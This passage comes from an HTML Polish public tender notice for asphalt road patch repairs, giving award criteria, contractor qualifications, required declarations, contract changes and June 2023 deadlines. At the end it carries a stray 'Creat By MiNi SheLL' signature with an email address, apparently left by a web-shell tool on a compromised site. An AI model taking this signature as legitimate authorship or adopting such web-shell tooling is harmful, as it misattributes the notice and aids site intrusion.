umowy .</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w systemie punktowym. Za najkorzystniejszą uważać się będzie ofertę, która<br/>uzyskała największą ilość punktów w oparciu o ustalone kryteria, według wzoru:<br/>P = C+R</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolność techniczna lub zawodowa<br/>1) Posiadanie wiedzy i doświadczenia<br/>Wykonawca musi wykazać, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, roboty budowlane,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca<br/>wykonania oraz załączeniem dowodów dotyczących robót określających, czy roboty te zostały wykonane należycie:<br/>a) Część I - Co najmniej jedną robotę budowlaną polegającej na zrealizowaniu remontu cząstkowego nawierzchni<br/>asfaltowych dróg za kwotę min. 25 000,00 PLN (brutto)<br/>b) Część II - Co najmniej jedną robotę budowlaną polegającej na zrealizowaniu remontu cząstkowego nawierzchni<br/>asfaltowych dróg za kwotę min. 120 000,00 PLN (brutto)<br/>2) Dysponowanie osobami zdolnymi Dysponowanie osobami zdolnymi do wykonania zamówienia -–część I-II<br/>Wykonawca musi mieć do dyspozycji osobę legitymującą się kwalifikacjami odpowiednimi do stanowiska, jakie zostaną tej<br/>osobie powierzone.<br/>W szczególności Wykonawca będzie dysponował osobą na wymienione w poniższej tabeli stanowisko.<br/>1 Kierownik budowy Uprawnienia budowlane do kierowania robotami w branży drogowej<br/>2.Przez posiadanie uprawnień budowlanych, wymaganych prawem dla osób uczestniczących w realizacji zamówienia,<br/>rozumie się uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994<br/>roku - Prawo budowlane (tekst jedn. Dz. U. z 2021 poz. 2351). Uprawnienia budowlane (nazwy specjalności i ich zakresy)<br/>będą rozpatrywane zgodnie z przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich nadania.<br/>3.Zgodnie z art. 12 a ustawy Prawo budowlane z dnia 7 lipca 1994 roku (tekst jedn. Dz. U.<br/>z 2021 roku, poz. 2351), samodzielne funkcje techniczne w budownictwie, mogą również wykonywać osoby, których<br/>odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych - ustawa z dnia 22<br/>grudnia 2015 roku o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>(tekst jedn. . Dz. U. z 2021 roku, poz. 1646)<br/>4.W przypadku składania oferty na więcej niż jedną część Zamawiający dopuszcza, aby<br/>wykonawca w celu wykazania spełnienia warunków udziału w postępowaniu<br/>posłużył się tym samym doświadczeniem dla części I i II oraz dysponowaniem tą samą osobą zdolną do wykonania<br/>zamówienia dla części I i II. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie<br/>wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z<br/>dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów ((Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną<br/>ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej<br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik<br/>nr 4 do SWZ;<br/>2. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty- załącznik nr 5 do SWZ.<br/>2. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami- załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz oferty.<br/>Oświadczenie wykonawcy dotyczące<br/>braku przesłanek wykluczenia z postępowania oraz spełniania warunków udziału w postępowaniu składane na podstawie<br/>art. 125 ust. 1 ustawy Pzp<br/>– załącznik nr 1 do SWZ.<br/>Wycena ofertowa -załącznik nr 3 do SWZ<br/>Pełnomocnictwo do reprezentowania Wykonawców w przedmiotowym postępowaniu o zamówienie publiczne albo<br/>reprezentowania Wykonawców w postępowaniu jw. i zawarcia umowy w sprawie przedmiotowego zamówienia, w przypadku<br/>Wykonawców ubiegających się wspólnie o udzielenie zamówienia.<br/>Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy. Przepisy dotyczące wykonawcy stosuje się odpowiednio do Wykonawców ubiegających się wspólnie o<br/>udzielenie zamówienia.<br/>2) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>3) W przypadku, o którym mowa w pkt.6.3 SWZ, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy.<br/>4) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w pkt<br/>7.1.1 składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu i brak podstaw<br/>wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza następujące zmiany umowy dotyczące:<br/>1) rezygnacji z podwykonawców,<br/>2) wskazanie innego zakresu podwykonawstwa,<br/>3) wykonania zamówienia przy pomocy podwykonawców, pomimo niewskazania w postępowaniu żadnej części zamówienia<br/>przeznaczonej do wykonania w ramach podwykonawstwa,<br/>4) zmian ilościowych w zaoferowanych pozycjach kosztorysowych, przy czym przedmiotowe zmiany nie spowodują wzrostu<br/>wartości całkowitego wynagrodzenia;<br/>5) zmiany ustawowej stawki procentowej podatku VAT – obecnie obowiązująca stawka podatku VAT wynosi 23%,<br/>6) zmiany dotyczącej terminu realizacji przedmiotu zamówienia w przypadku wystąpienia warunków pogodowych<br/>uniemożliwiających prawidłowe, zgodne ze sztuka budowlaną, wykonania robót. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-19 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-19 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu,<br/>o których mowa w pkt.7.6.2 SWZ, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę<br/>lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest<br/>zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w<br/>przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej<br/>niż 3 miesiące przed upływem terminu składania ofert.<br/>2.Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa<br/>w pkt.7.6.2 SWZ zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie<br/>wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument<br/>miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie<br/>ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania<br/>wykonawcy.<br/>3. Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. w celu przeciwdziałania wspieraniu agresji Federacji<br/>Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022 r. ((Dz.U. z 2022 r. poz. 835), zwana dalej „ustawą sankcyjną” z<br/>postępowania<br/>o udzielenie zamówienia publicznego wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na<br/>listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy sankcyjnej;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu<br/>na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy sankcyjnej;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach<br/>określonych<br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia<br/>24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3 ustawy sankcyjnej.

Creat By MiNi SheLL
Email: jattceo@gmail.com